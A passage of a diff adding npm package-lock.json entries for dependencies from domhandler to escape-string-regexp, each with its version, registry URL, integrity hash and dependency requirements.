}, + "funding": { + "url": "https://github.com/fb55/domhandler?sponsor=1" + } + }, + "node_modules/dompurify": { + "version": "3.2.4", + "resolved": "https://registry.npmjs.org/dompurify/-/dompurify-3.2.4.tgz", + "integrity": "sha512-ysFSFEDVduQpyhzAob/kkuJjf5zWkZD8/A9ywSp1byueyuCfHamrCBa14/Oc2iiB0e51B+NpxSl5gmzn+Ms/mg==", + "dev": true, + "license": "(MPL-2.0 OR Apache-2.0)", + "optionalDependencies": { + "@types/trusted-types": "^2.0.7" + } + }, + "node_modules/domutils": { + "version": "2.8.0", + "resolved": "https://registry.npmjs.org/domutils/-/domutils-2.8.0.tgz", + "integrity": 
"sha512-w96Cjofp72M5IIhpjgobBimYEfoPjx1Vx0BSX9P30WBdZW2WIKU0T1Bd0kz2eNZ9ikjKgHbEyKx8BB6H1L3h3A==", + "dev": true, + "dependencies": { + "dom-serializer": "^1.0.1", + "domelementtype": "^2.2.0", + "domhandler": "^4.2.0" + }, + "funding": { + "url": "https://github.com/fb55/domutils?sponsor=1" + } + }, + "node_modules/dont-sniff-mimetype": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/dont-sniff-mimetype/-/dont-sniff-mimetype-1.1.0.tgz", + "integrity": "sha512-ZjI4zqTaxveH2/tTlzS1wFp+7ncxNZaIEWYg3lzZRHkKf5zPT/MnEG6WL0BhHMJUabkh8GeU5NL5j+rEUCb7Ug==", + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/dot-case": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/dot-case/-/dot-case-3.0.4.tgz", + "integrity": "sha512-Kv5nKlh6yRrdrGvxeJ2e5y2eRUpkUosIW4A2AS38zwSz27zu7ufDwQPi5Jhs3XAlGNetl3bmnGhQsMtkKJnj3w==", + "dev": true, + "dependencies": { + "no-case": "^3.0.4", + "tslib": "^2.0.3" + } + }, + "node_modules/dot-prop": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/dot-prop/-/dot-prop-6.0.1.tgz", + "integrity": "sha512-tE7ztYzXHIeyvc7N+hR3oi7FIbf/NIjVP9hmAt3yMXzrQ072/fpjGLx2GxNxGxUl5V73MEqYzioOMoVhGMJ5cA==", + "dependencies": { + "is-obj": "^2.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/dottie": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/dottie/-/dottie-2.0.6.tgz", + "integrity": "sha512-iGCHkfUc5kFekGiqhe8B/mdaurD+lakO9txNnTvKtA6PISrw86LgqHvRzWYPyoE2Ph5aMIrCw9/uko6XHTKCwA==" + }, + "node_modules/downshift": { + "version": "6.1.7", + "resolved": "https://registry.npmjs.org/downshift/-/downshift-6.1.7.tgz", + "integrity": "sha512-cVprZg/9Lvj/uhYRxELzlu1aezRcgPWBjTvspiGTVEU64gF5pRdSRKFVLcxqsZC637cLAGMbL40JavEfWnqgNg==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.14.8", + "compute-scroll-into-view": "^1.0.17", + "prop-types": "^15.7.2", + "react-is": "^17.0.2", + "tslib": "^2.3.0" + }, + "peerDependencies": { + "react": ">=16.12.0" + } + }, + "node_modules/dropbox": { + "version": "10.34.0", + "resolved": "https://registry.npmjs.org/dropbox/-/dropbox-10.34.0.tgz", + "integrity": "sha512-5jb5/XzU0fSnq36/hEpwT5/QIep7MgqKuxghEG44xCu7HruOAjPdOb3x0geXv5O/hd0nHpQpWO+r5MjYTpMvJg==", + "dependencies": { + "node-fetch": "^2.6.1" + }, + "engines": { + "node": ">=0.10.3" + }, + "peerDependencies": { + "@types/node-fetch": "^2.5.7" + } + }, + "node_modules/dset": { + "version": "3.1.4", + "resolved": "https://registry.npmjs.org/dset/-/dset-3.1.4.tgz", + "integrity": "sha512-2QF/g9/zTaPDc3BjNcVTGoBbXBgYfMTTceLaYcFJ/W9kggFUkhxD/hMEeuLKbugyef9SqAx8cpgwlIP/jinUTA==", + "license": "MIT", + "engines": { + "node": ">=4" + } + }, + "node_modules/dtrace-provider": { + "version": "0.8.8", + "resolved": "https://registry.npmjs.org/dtrace-provider/-/dtrace-provider-0.8.8.tgz", + "integrity": "sha512-b7Z7cNtHPhH9EJhNNbbeqTcXB8LGFFZhq1PGgEvpeHlzd36bhbdTWoE/Ba/YguqpBSlAPKnARWhVlhunCMwfxg==", + "hasInstallScript": true, + "dependencies": { + "nan": "^2.14.0" + }, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/duration": { + "version": "0.2.2", + "resolved": "https://registry.npmjs.org/duration/-/duration-0.2.2.tgz", + "integrity": "sha512-06kgtea+bGreF5eKYgI/36A6pLXggY7oR4p1pq4SmdFBn1ReOL5D8RhG64VrqfTTKNucqqtBAwEj8aB88mcqrg==", + "dependencies": { + "d": "1", + "es5-ext": "~0.10.46" + } + }, + "node_modules/east": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/east/-/east-2.0.3.tgz", + "integrity": 
"sha512-ZY0gVpOxMPs99TXSK1v+KIzR2G4yP5Sru6XNbun2ebjZCWxcTQWnYdTlzHGMd7KDmiCOuZtbh8TvelakV3BWMw==", + "dependencies": { + "commander": "5.1.0", + "expressionify": "0.9.3", + "mhook": "1.0.1", + "p-map": "4.0.0", + "p-props": "4.0.0", + "p-timeout": "3.2.0", + "path-exists": "4.0.0", + "underscore": "1.12.1" + }, + "bin": { + "east": "bin/east.js" + }, + "engines": { + "node": ">=10.17.0" + } + }, + "node_modules/east/node_modules/commander": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/commander/-/commander-5.1.0.tgz", + "integrity": "sha512-P0CysNDQ7rtVw4QIQtm+MRxV66vKFSvlsQvGYXZWR3qFU0jlMKHZZZgw8e+8DSah4UDKMqnknRDQz+xuQXQ/Zg==", + "engines": { + "node": ">= 6" + } + }, + "node_modules/east/node_modules/underscore": { + "version": "1.12.1", + "resolved": "https://registry.npmjs.org/underscore/-/underscore-1.12.1.tgz", + "integrity": "sha512-hEQt0+ZLDVUMhebKxL4x1BTtDY7bavVofhZ9KZ4aI26X9SRaE+Y3m83XUL1UP2jn8ynjndwCCpEHdUG+9pP1Tw==" + }, + "node_modules/eastasianwidth": { + "version": "0.2.0", + "resolved": "https://registry.npmjs.org/eastasianwidth/-/eastasianwidth-0.2.0.tgz", + "integrity": "sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==", + "dev": true + }, + "node_modules/ecc-jsbn": { + "version": "0.1.2", + "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", + "integrity": "sha1-OoOpBOVDUyh4dMVkt1SThoSamMk=", + "dependencies": { + "jsbn": "~0.1.0", + "safer-buffer": "^2.1.0" + } + }, + "node_modules/ecdsa-sig-formatter": { + "version": "1.0.11", + "resolved": "https://registry.npmjs.org/ecdsa-sig-formatter/-/ecdsa-sig-formatter-1.0.11.tgz", + "integrity": "sha512-nagl3RYrbNv6kQkeJIpt6NJZy8twLB/2vtz6yN9Z4vRKHN4/QZJIEbqohALSgwKdnksuY3k5Addp5lg8sVoVcQ==", + "dependencies": { + "safe-buffer": "^5.0.1" + } + }, + "node_modules/editorconfig": { + "version": "0.15.3", + "resolved": "https://registry.npmjs.org/editorconfig/-/editorconfig-0.15.3.tgz", + "integrity": "sha512-M9wIMFx96vq0R4F+gRpY3o2exzb8hEj/n9S8unZtHSvYjibBp/iMufSzvmOcV/laG0ZtuTVGtiJggPOSW2r93g==", + "dev": true, + "dependencies": { + "commander": "^2.19.0", + "lru-cache": "^4.1.5", + "semver": "^5.6.0", + "sigmund": "^1.0.1" + }, + "bin": { + "editorconfig": "bin/editorconfig" + } + }, + "node_modules/editorconfig/node_modules/commander": { + "version": "2.20.3", + "resolved": "https://registry.npmjs.org/commander/-/commander-2.20.3.tgz", + "integrity": "sha512-GpVkmM8vF2vQUkj2LvZmD35JxeJOLCwJ9cUkugyk2nuhbv3+mJvpLYYt+0+USMxE+oj+ey/lJEnhZw75x/OMcQ==", + "dev": true + }, + "node_modules/editorconfig/node_modules/lru-cache": { + "version": "4.1.5", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-4.1.5.tgz", + "integrity": "sha512-sWZlbEP2OsHNkXrMl5GYk/jKk70MBng6UU4YI/qGDYbgf6YbP4EvmqISbXCoJiRKs+1bSpFHVgQxvJ17F2li5g==", + "dev": true, + "dependencies": { + "pseudomap": "^1.0.2", + "yallist": "^2.1.2" + } + }, + "node_modules/editorconfig/node_modules/semver": { + "version": "5.7.2", + "resolved": "https://registry.npmjs.org/semver/-/semver-5.7.2.tgz", + "integrity": "sha512-cBznnQ9KjJqU67B52RMC65CMarK2600WFnbkcaiwWq3xy/5haFJlshgnpjovMVJ+Hff49d8GEn0b87C5pDQ10g==", + "dev": true, + "bin": { + "semver": "bin/semver" + } + }, + "node_modules/editorconfig/node_modules/yallist": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-2.1.2.tgz", + "integrity": "sha512-ncTzHV7NvsQZkYe1DW7cbDLm0YpzHmZF5r/iyP3ZnQtMiJ+pjzisCiMNI+Sj+xQF5pXhSHxSB3uDbsBTzY/c2A==", + "dev": true + }, + "node_modules/ee-first": { + 
"version": "1.1.1", + "resolved": "https://registry.npmjs.org/ee-first/-/ee-first-1.1.1.tgz", + "integrity": "sha1-WQxhFWsK4vTwJVcyoViyZrxWsh0=" + }, + "node_modules/ejs": { + "version": "3.1.10", + "resolved": "https://registry.npmjs.org/ejs/-/ejs-3.1.10.tgz", + "integrity": "sha512-UeJmFfOrAQS8OJWPZ4qtgHyWExa088/MtK5UEyoJGFH67cDEXkZSviOiKRCZ4Xij0zxI3JECgYs3oKx+AizQBA==", + "dependencies": { + "jake": "^10.8.5" + }, + "bin": { + "ejs": "bin/cli.js" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/electron-to-chromium": { + "version": "1.5.34", + "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.5.34.tgz", + "integrity": "sha512-/TZAiChbAflBNjCg+VvstbcwAtIL/VdMFO3NgRFIzBjpvPzWOTIbbO8kNb6RwU4bt9TP7K+3KqBKw/lOU+Y+GA==", + "dev": true + }, + "node_modules/email-addresses": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/email-addresses/-/email-addresses-5.0.0.tgz", + "integrity": "sha512-4OIPYlA6JXqtVn8zpHpGiI7vE6EQOAg16aGnDMIAlZVinnoZ8208tW1hAbjWydgN/4PLTT9q+O1K6AH/vALJGw==" + }, + "node_modules/emoji-regex": { + "version": "8.0.0", + "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", + "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" + }, + "node_modules/emojis-list": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/emojis-list/-/emojis-list-3.0.0.tgz", + "integrity": "sha512-/kyM18EfinwXZbno9FyUGeFh87KC8HRQBQGildHZbEuRyWFOmv1U10o9BBp8XVZDVNNuQKyIGIu5ZYAAXJ0V2Q==", + "dev": true, + "engines": { + "node": ">= 4" + } + }, + "node_modules/encode-utf8": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/encode-utf8/-/encode-utf8-1.0.3.tgz", + "integrity": "sha512-ucAnuBEhUK4boH2HjVYG5Q2mQyPorvv0u/ocS+zhdw0S8AlHYY+GOFhP1Gio5z4icpP2ivFSvhtFjQi8+T9ppw==", + "dev": true + }, + "node_modules/encodeurl": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/encodeurl/-/encodeurl-1.0.2.tgz", + "integrity": "sha1-rT/0yG7C0CkyL1oCw6mmBslbP1k=", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/end-of-stream": { + "version": "1.4.4", + "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.4.tgz", + "integrity": "sha512-+uw1inIHVPQoaVuHzRyXd21icM+cnt4CzD5rW+NC1wjOUSTOs+Te7FOv7AhN7vS9x/oIyhLP5PR1H+phQAHu5Q==", + "dependencies": { + "once": "^1.4.0" + } + }, + "node_modules/endent": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/endent/-/endent-2.1.0.tgz", + "integrity": "sha512-r8VyPX7XL8U01Xgnb1CjZ3XV+z90cXIJ9JPE/R9SEC9vpw2P6CfsRPJmp20DppC5N7ZAMCmjYkJIa744Iyg96w==", + "dev": true, + "license": "MIT", + "dependencies": { + "dedent": "^0.7.0", + "fast-json-parse": "^1.0.3", + "objectorarray": "^1.0.5" + } + }, + "node_modules/enhanced-resolve": { + "version": "5.17.1", + "resolved": "https://registry.npmjs.org/enhanced-resolve/-/enhanced-resolve-5.17.1.tgz", + "integrity": "sha512-LMHl3dXhTcfv8gM4kEzIUeTQ+7fpdA0l2tUf34BddXPkz2A5xJ5L/Pchd5BL6rdccM9QGvu0sWZzK1Z1t4wwyg==", + "dev": true, + "dependencies": { + "graceful-fs": "^4.2.4", + "tapable": "^2.2.0" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/enquirer": { + "version": "2.3.6", + "resolved": "https://registry.npmjs.org/enquirer/-/enquirer-2.3.6.tgz", + "integrity": "sha512-yjNnPr315/FjS4zIsUxYguYUPP2e1NK4d7E7ZOLiyYCcbFBiTMyID+2wvm2w6+pZ/odMA7cRkjhsPbltwBOrLg==", + "dev": true, + "dependencies": { + "ansi-colors": "^4.1.1" + }, + "engines": { + "node": ">=8.6" + } + }, + 
"node_modules/ensure-type": { + "version": "1.5.1", + "resolved": "https://registry.npmjs.org/ensure-type/-/ensure-type-1.5.1.tgz", + "integrity": "sha512-Dxe+mVF4MupV6eueWiFa6hUd9OL9lIM2/LqR40k1P+dwG+G2il2UigXTU9aQlaw+Y/N0BKSaTofNw73htTbC5g==", + "dev": true + }, + "node_modules/ent": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/ent/-/ent-2.2.0.tgz", + "integrity": "sha1-6WQhkyWiHQX0RGai9obtbOX13R0=" + }, + "node_modules/entities": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/entities/-/entities-2.2.0.tgz", + "integrity": "sha512-p92if5Nz619I0w+akJrLZH0MX0Pb5DX39XOwQTtXSdQQOaYH03S1uIQp4mhOZtAXrxq4ViO67YTiLBo2638o9A==", + "dev": true, + "funding": { + "url": "https://github.com/fb55/entities?sponsor=1" + } + }, + "node_modules/env-paths": { + "version": "2.2.1", + "resolved": "https://registry.npmjs.org/env-paths/-/env-paths-2.2.1.tgz", + "integrity": "sha512-+h1lkLKhZMTYjog1VEpJNG7NZJWcuc2DDk/qsqSTRRCOXiLjeQ1d1/udrUGhqMxUgAlwKNZ0cf2uqan5GLuS2A==", + "dev": true, + "peer": true, + "engines": { + "node": ">=6" + } + }, + "node_modules/envify": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/envify/-/envify-4.1.0.tgz", + "integrity": "sha512-IKRVVoAYr4pIx4yIWNsz9mOsboxlNXiu7TNBnem/K/uTHdkyzXWDzHCK7UTolqBbgaBz0tQHsD3YNls0uIIjiw==", + "dev": true, + "dependencies": { + "esprima": "^4.0.0", + "through": "~2.3.4" + }, + "bin": { + "envify": "bin/envify" + } + }, + "node_modules/envinfo": { + "version": "7.8.1", + "resolved": "https://registry.npmjs.org/envinfo/-/envinfo-7.8.1.tgz", + "integrity": "sha512-/o+BXHmB7ocbHEAs6F2EnG0ogybVVUdkRunTT2glZU9XAaGmhqskrvKwqXuDfNjEO0LZKWdejEEpnq8aM0tOaw==", + "dev": true, + "bin": { + "envinfo": "dist/cli.js" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/eol": { + "version": "0.9.1", + "resolved": "https://registry.npmjs.org/eol/-/eol-0.9.1.tgz", + "integrity": "sha512-Ds/TEoZjwggRoz/Q2O7SE3i4Jm66mqTDfmdHdq/7DKVk3bro9Q8h6WdXKdPqFLMoqxrDK5SVRzHVPOS6uuGtrg==", + "dev": true + }, + "node_modules/errno": { + "version": "0.1.8", + "resolved": "https://registry.npmjs.org/errno/-/errno-0.1.8.tgz", + "integrity": "sha512-dJ6oBr5SQ1VSd9qkk7ByRgb/1SH4JZjCHSW/mr63/QcXO9zLVxvJ6Oy13nio03rxpSnVDDjFor75SjVeZWPW/A==", + "dev": true, + "optional": true, + "dependencies": { + "prr": "~1.0.1" + }, + "bin": { + "errno": "cli.js" + } + }, + "node_modules/error": { + "version": "7.0.2", + "resolved": "https://registry.npmjs.org/error/-/error-7.0.2.tgz", + "integrity": "sha512-UtVv4l5MhijsYUxPJo4390gzfZvAnTHreNnDjnTZaKIiZ/SemXxAhBkYSKtWa5RtBXbLP8tMgn/n0RUa/H7jXw==", + "dependencies": { + "string-template": "~0.2.1", + "xtend": "~4.0.0" + } + }, + "node_modules/error-ex": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", + "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", + "dev": true, + "dependencies": { + "is-arrayish": "^0.2.1" + } + }, + "node_modules/error-stack-parser": { + "version": "2.1.4", + "resolved": "https://registry.npmjs.org/error-stack-parser/-/error-stack-parser-2.1.4.tgz", + "integrity": "sha512-Sk5V6wVazPhq5MhpO+AUxJn5x7XSXGl1R93Vn7i+zS15KDVxQijejNCrz8340/2bgLBjR9GtEG8ZVKONDjcqGQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "stackframe": "^1.3.4" + } + }, + "node_modules/es-abstract": { + "version": "1.23.3", + "resolved": "https://registry.npmjs.org/es-abstract/-/es-abstract-1.23.3.tgz", + "integrity": 
"sha512-e+HfNH61Bj1X9/jLc5v1owaLYuHdeHHSQlkhCBiTK8rBvKaULl/beGMxwrMXjpYrv4pz22BlY570vVePA2ho4A==", + "license": "MIT", + "dependencies": { + "array-buffer-byte-length": "^1.0.1", + "arraybuffer.prototype.slice": "^1.0.3", + "available-typed-arrays": "^1.0.7", + "call-bind": "^1.0.7", + "data-view-buffer": "^1.0.1", + "data-view-byte-length": "^1.0.1", + "data-view-byte-offset": "^1.0.0", + "es-define-property": "^1.0.0", + "es-errors": "^1.3.0", + "es-object-atoms": "^1.0.0", + "es-set-tostringtag": "^2.0.3", + "es-to-primitive": "^1.2.1", + "function.prototype.name": "^1.1.6", + "get-intrinsic": "^1.2.4", + "get-symbol-description": "^1.0.2", + "globalthis": "^1.0.3", + "gopd": "^1.0.1", + "has-property-descriptors": "^1.0.2", + "has-proto": "^1.0.3", + "has-symbols": "^1.0.3", + "hasown": "^2.0.2", + "internal-slot": "^1.0.7", + "is-array-buffer": "^3.0.4", + "is-callable": "^1.2.7", + "is-data-view": "^1.0.1", + "is-negative-zero": "^2.0.3", + "is-regex": "^1.1.4", + "is-shared-array-buffer": "^1.0.3", + "is-string": "^1.0.7", + "is-typed-array": "^1.1.13", + "is-weakref": "^1.0.2", + "object-inspect": "^1.13.1", + "object-keys": "^1.1.1", + "object.assign": "^4.1.5", + "regexp.prototype.flags": "^1.5.2", + "safe-array-concat": "^1.1.2", + "safe-regex-test": "^1.0.3", + "string.prototype.trim": "^1.2.9", + "string.prototype.trimend": "^1.0.8", + "string.prototype.trimstart": "^1.0.8", + "typed-array-buffer": "^1.0.2", + "typed-array-byte-length": "^1.0.1", + "typed-array-byte-offset": "^1.0.2", + "typed-array-length": "^1.0.6", + "unbox-primitive": "^1.0.2", + "which-typed-array": "^1.1.15" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/es-define-property": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.0.tgz", + "integrity": "sha512-jxayLKShrEqqzJ0eumQbVhTYQM27CfT1T35+gCgDFoL82JLsXqTJ76zv6A0YLOgEnLUMvLzsDsGIrl8NFpT2gQ==", + "dependencies": { + "get-intrinsic": "^1.2.4" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/es-errors": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz", + "integrity": "sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/es-get-iterator": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/es-get-iterator/-/es-get-iterator-1.1.3.tgz", + "integrity": "sha512-sPZmqHBe6JIiTfN5q2pEi//TwxmAFHwj/XEuYjTuse78i8KxaqMTTzxPoFKuzRpDpTJ+0NAbpfenkmH2rePtuw==", + "dev": true, + "dependencies": { + "call-bind": "^1.0.2", + "get-intrinsic": "^1.1.3", + "has-symbols": "^1.0.3", + "is-arguments": "^1.1.1", + "is-map": "^2.0.2", + "is-set": "^2.0.2", + "is-string": "^1.0.7", + "isarray": "^2.0.5", + "stop-iteration-iterator": "^1.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/es-module-lexer": { + "version": "1.5.4", + "resolved": "https://registry.npmjs.org/es-module-lexer/-/es-module-lexer-1.5.4.tgz", + "integrity": "sha512-MVNK56NiMrOwitFB7cqDwq0CQutbw+0BvLshJSse0MUNU+y1FC3bUS/AQg7oUng+/wKrrki7JfmwtVHkVfPLlw==", + "dev": true, + "license": "MIT" + }, + "node_modules/es-object-atoms": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.0.0.tgz", + "integrity": "sha512-MZ4iQ6JwHOBQjahnjwaC1ZtIBH+2ohjamzAO3oaHcXYup7qxjF2fixyH+Q71voWHeOkI2q/TnJao/KfXYIZWbw==", + 
"license": "MIT", + "dependencies": { + "es-errors": "^1.3.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/es-set-tostringtag": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.0.3.tgz", + "integrity": "sha512-3T8uNMC3OQTHkFUsFq8r/BwAXLHvU/9O9mE0fBc/MY5iq/8H7ncvO947LmYA6ldWw9Uh8Yhf25zu6n7nML5QWQ==", + "license": "MIT", + "dependencies": { + "get-intrinsic": "^1.2.4", + "has-tostringtag": "^1.0.2", + "hasown": "^2.0.1" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/es-shim-unscopables": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/es-shim-unscopables/-/es-shim-unscopables-1.0.0.tgz", + "integrity": "sha512-Jm6GPcCdC30eMLbZ2x8z2WuRwAws3zTBBKuusffYVUrNj/GVSUAZ+xKMaUpfNDR5IbyNA5LJbaecoUVbmUcB1w==", + "dev": true, + "dependencies": { + "has": "^1.0.3" + } + }, + "node_modules/es-to-primitive": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/es-to-primitive/-/es-to-primitive-1.2.1.tgz", + "integrity": "sha512-QCOllgZJtaUo9miYBcLChTUaHNjJF3PYs1VidD7AwiEj1kYxKeQTctLAezAOH5ZKRH0g2IgPn6KwB4IT8iRpvA==", + "dependencies": { + "is-callable": "^1.1.4", + "is-date-object": "^1.0.1", + "is-symbol": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/es-toolkit": { + "version": "1.32.0", + "resolved": "https://registry.npmjs.org/es-toolkit/-/es-toolkit-1.32.0.tgz", + "integrity": "sha512-ZfSfHP1l6ubgW/B/FRtqb9bYdMvI6jizbOSfbwwJNcOQ1QE6TFsC3jpQkZ900uUPSR3t3SU5Ds7UWKnYz+uP8Q==", + "dev": true, + "license": "MIT", + "workspaces": [ + "docs", + "benchmarks" + ] + }, + "node_modules/es5-ext": { + "version": "0.10.64", + "resolved": "https://registry.npmjs.org/es5-ext/-/es5-ext-0.10.64.tgz", + "integrity": "sha512-p2snDhiLaXe6dahss1LddxqEm+SkuDvV8dnIQG0MWjyHpcMNfXKPE+/Cc0y+PhxJX3A4xGNeFCj5oc0BUh6deg==", + "hasInstallScript": true, + "dependencies": { + "es6-iterator": "^2.0.3", + "es6-symbol": "^3.1.3", + "esniff": "^2.0.1", + "next-tick": "^1.1.0" + }, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/es6-iterator": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/es6-iterator/-/es6-iterator-2.0.3.tgz", + "integrity": "sha1-p96IkUGgWpSwhUQDstCg+/qY87c=", + "dependencies": { + "d": "1", + "es5-ext": "^0.10.35", + "es6-symbol": "^3.1.1" + } + }, + "node_modules/es6-promise": { + "version": "4.2.8", + "resolved": "https://registry.npmjs.org/es6-promise/-/es6-promise-4.2.8.tgz", + "integrity": "sha512-HJDGx5daxeIvxdBxvG2cb9g4tEvwIk3i8+nhX0yGrYmZUzbkdg8QbDevheDB8gd0//uPj4c1EQua8Q+MViT0/w==" + }, + "node_modules/es6-symbol": { + "version": "3.1.3", + "resolved": "https://registry.npmjs.org/es6-symbol/-/es6-symbol-3.1.3.tgz", + "integrity": "sha512-NJ6Yn3FuDinBaBRWl/q5X/s4koRHBrgKAu+yGI6JCBeiu3qrcbJhwT2GeR/EXVfylRk8dpQVJoLEFhK+Mu31NA==", + "dependencies": { + "d": "^1.0.1", + "ext": "^1.1.2" + } + }, + "node_modules/es6-weak-map": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/es6-weak-map/-/es6-weak-map-2.0.3.tgz", + "integrity": "sha512-p5um32HOTO1kP+w7PRnB+5lQ43Z6muuMuIMffvDN8ZB4GcnjLBV6zGStpbASIMk4DCAvEaamhe2zhyCb/QXXsA==", + "dev": true, + "dependencies": { + "d": "1", + "es5-ext": "^0.10.46", + "es6-iterator": "^2.0.3", + "es6-symbol": "^3.1.1" + } + }, + "node_modules/esbuild": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/esbuild/-/esbuild-0.25.0.tgz", + "integrity": 
"sha512-BXq5mqc8ltbaN34cDqWuYKyNhX8D/Z0J1xdtdQ8UcIIIyJyz+ZMKUt58tF3SrZ85jcfN/PZYhjR5uDQAYNVbuw==", + "dev": true, + "hasInstallScript": true, + "license": "MIT", + "bin": { + "esbuild": "bin/esbuild" + }, + "engines": { + "node": ">=18" + }, + "optionalDependencies": { + "@esbuild/aix-ppc64": "0.25.0", + "@esbuild/android-arm": "0.25.0", + "@esbuild/android-arm64": "0.25.0", + "@esbuild/android-x64": "0.25.0", + "@esbuild/darwin-arm64": "0.25.0", + "@esbuild/darwin-x64": "0.25.0", + "@esbuild/freebsd-arm64": "0.25.0", + "@esbuild/freebsd-x64": "0.25.0", + "@esbuild/linux-arm": "0.25.0", + "@esbuild/linux-arm64": "0.25.0", + "@esbuild/linux-ia32": "0.25.0", + "@esbuild/linux-loong64": "0.25.0", + "@esbuild/linux-mips64el": "0.25.0", + "@esbuild/linux-ppc64": "0.25.0", + "@esbuild/linux-riscv64": "0.25.0", + "@esbuild/linux-s390x": "0.25.0", + "@esbuild/linux-x64": "0.25.0", + "@esbuild/netbsd-arm64": "0.25.0", + "@esbuild/netbsd-x64": "0.25.0", + "@esbuild/openbsd-arm64": "0.25.0", + "@esbuild/openbsd-x64": "0.25.0", + "@esbuild/sunos-x64": "0.25.0", + "@esbuild/win32-arm64": "0.25.0", + "@esbuild/win32-ia32": "0.25.0", + "@esbuild/win32-x64": "0.25.0" + } + }, + "node_modules/esbuild-register": { + "version": "3.6.0", + "resolved": "https://registry.npmjs.org/esbuild-register/-/esbuild-register-3.6.0.tgz", + "integrity": "sha512-H2/S7Pm8a9CL1uhp9OvjwrBh5Pvx0H8qVOxNu8Wed9Y7qv56MPtq+GGM8RJpq6glYJn9Wspr8uw7l55uyinNeg==", + "dev": true, + "license": "MIT", + "dependencies": { + "debug": "^4.3.4" + }, + "peerDependencies": { + "esbuild": ">=0.12 <1" + } + }, + "node_modules/esbuild-register/node_modules/debug": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.0.tgz", + "integrity": "sha512-6WTZ/IxCY/T6BALoZHaE4ctp9xm+Z5kY/pzYaCHRFeyVhojxlrm+46y68HA6hr0TcwEssoxNiDEUJQjfPZ/RYA==", + "dev": true, + "license": "MIT", + "dependencies": { + "ms": "^2.1.3" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/escalade": { + "version": "3.1.2", + "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.2.tgz", + "integrity": "sha512-ErCHMCae19vR8vQGe50xIsVomy19rg6gFu3+r3jkEO46suLMWBksvVyoGgQV+jOfl84ZSOSlmv6Gxa89PmTGmA==", + "engines": { + "node": ">=6" + } + }, + "node_modules/escape-html": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/escape-html/-/escape-html-1.0.3.tgz", + "integrity": "sha1-Aljq5NPQwJdN4cFpGI7wBR0dGYg=" + }, + "node_modules/escape-string-regexp": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-4.0.0.tgz", + "integrity": 